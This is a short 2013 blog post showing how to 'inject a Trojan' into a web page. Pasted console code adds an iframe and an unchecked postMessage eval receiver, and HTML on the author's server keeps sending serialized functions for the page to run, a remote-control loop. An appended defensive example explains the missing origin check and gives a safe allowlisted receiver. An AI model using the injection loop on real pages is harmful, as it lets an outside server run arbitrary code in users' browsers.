Friday, April 5, 2013

use window.postMessage to hack a page

Just wondering if I can inject a Trojan into a page so that my server can control the client to run any JavaScript. Here I found a solution: https://developer.mozilla.org/en-US/docs/DOM/window.postMessage
 
Press F12 in Chrome and paste the following JS code into the Console:
 
// inject iframe window
var body = document.getElementsByTagName('body')[0];
var iframe = document.createElement('iframe');
iframe.id = "proxy_iframe";
iframe.src = 'http://localhost:24189/';
body.appendChild(iframe);

// register callback: event.origin is never checked, so any window that can
// reach this page may post a string that is then eval'd in the host page
function receiveMessage(event) {
    eval("(" + event.data + ")();");
}
window.addEventListener("message", receiveMessage, false);

// invoke: ask the iframe for the first job once it has had time to load
window.setTimeout(function () {
    iframe.contentWindow.postMessage("0", "*");
}, 1000);
 
Replace localhost:24189 with a server you control.
 
On the server, respond with HTML like this:
 
<html>
    <head>
        <title>Proxy</title>
        <script>
            // return a function to exec in host
            function loop(args) {
                return function () {
                    function crawl(url) {
                        alert(url);
                    }
                    crawl((new Date()).toString());
                    // "iframe" is the host page's global created in the Console
                    window.setTimeout(function () {
                        iframe.contentWindow.postMessage("0", "*");
                    }, 1000);
                };
            }

            window.onload = function () {

                function receiveMessage(event) {
                    event.source.postMessage(loop(event.data).toString(), event.origin);
                }

                window.addEventListener("message", receiveMessage, false);
            };
        </script>
    </head>
    <body></body>
</html>
The magic here is that you can serialize a function as a string, send it from your server to the host page, and run the script in the host page. Don't forget, at the end of the function, to use window.setTimeout so the host page fetches more jobs from your server later XD. Note that this only works because the host page's receiveMessage never checks event.origin and passes event.data straight to eval; that is exactly the mistake the MDN page above warns against, and it is why a real page should validate the sender's origin and treat message data as data, never as code.
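For contrast, here is the receiver a defender would write for the host page. This is an added example, not code from the post: it checks event.origin against an allowlist, accepts only structured JSON messages of known types, dispatches to a fixed set of handlers instead of eval, and replies to the trusted origin rather than "*". TRUSTED_ORIGIN, the handler names and the sample events are constructed placeholders, not values from the post.

```javascript
// Added example (not the post's own code): a postMessage receiver that rejects
// messages from unexpected origins and never evaluates message data as code.
// Assumption: the only legitimate sender is a frame served from TRUSTED_ORIGIN.
var TRUSTED_ORIGIN = "https://proxy.example.com"; // constructed placeholder

// Fixed set of operations the host page is willing to perform. Each receives
// plain data; nothing from the message ever reaches eval() or Function().
var handlers = {
  ping: function () {
    return { type: "pong" };
  },
  showText: function (payload) {
    var text = typeof payload.text === "string" ? payload.text : "";
    return { type: "shown", length: text.length };
  }
};

// Returns a reply object, or null if the message must be ignored.
function receiveMessage(event) {
  // 1. Origin check. Skipping this (as the post's receiver does) lets any
  //    window that can obtain a reference to this page drive it.
  if (event.origin !== TRUSTED_ORIGIN) return null;

  // 2. Only accept structured data, never code strings.
  var msg = event.data;
  if (typeof msg === "string") {
    try {
      msg = JSON.parse(msg);
    } catch (e) {
      return null;
    }
  }
  if (!msg || typeof msg !== "object" || typeof msg.type !== "string") return null;

  // 3. Dispatch only to own-property handlers, so names like "toString" or
  //    "__proto__" cannot reach Object.prototype.
  if (!Object.prototype.hasOwnProperty.call(handlers, msg.type)) return null;
  var payload = msg.payload && typeof msg.payload === "object" ? msg.payload : {};
  return handlers[msg.type](payload);
}

// Reply only to the trusted origin; a "*" targetOrigin would hand the reply
// to whatever document currently occupies the sender's window.
function reply(event, data) {
  if (event.origin !== TRUSTED_ORIGIN) return false;
  event.source.postMessage(JSON.stringify(data), TRUSTED_ORIGIN);
  return true;
}

// Browser wiring; skipped when run under Node for the demo below.
if (typeof window !== "undefined") {
  window.addEventListener("message", function (event) {
    var result = receiveMessage(event);
    if (result) reply(event, result);
  }, false);
}

// Constructed sample events shaped like what a browser delivers (not captures).
function demo() {
  var fromTrusted = {
    origin: TRUSTED_ORIGIN,
    data: JSON.stringify({ type: "showText", payload: { text: "hello" } })
  };
  // A string of code from an untrusted frame, like the post's loop() payload.
  var fromUntrusted = {
    origin: "http://localhost:24189",
    data: "function () { alert('owned'); }"
  };
  return {
    trusted: receiveMessage(fromTrusted),
    untrusted: receiveMessage(fromUntrusted)
  };
}
```

Running demo() shows the untrusted code string being dropped (null) while the trusted structured message is handled; the same origin check applies on the reply path, so even a trusted frame never gets a reply broadcast to "*".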
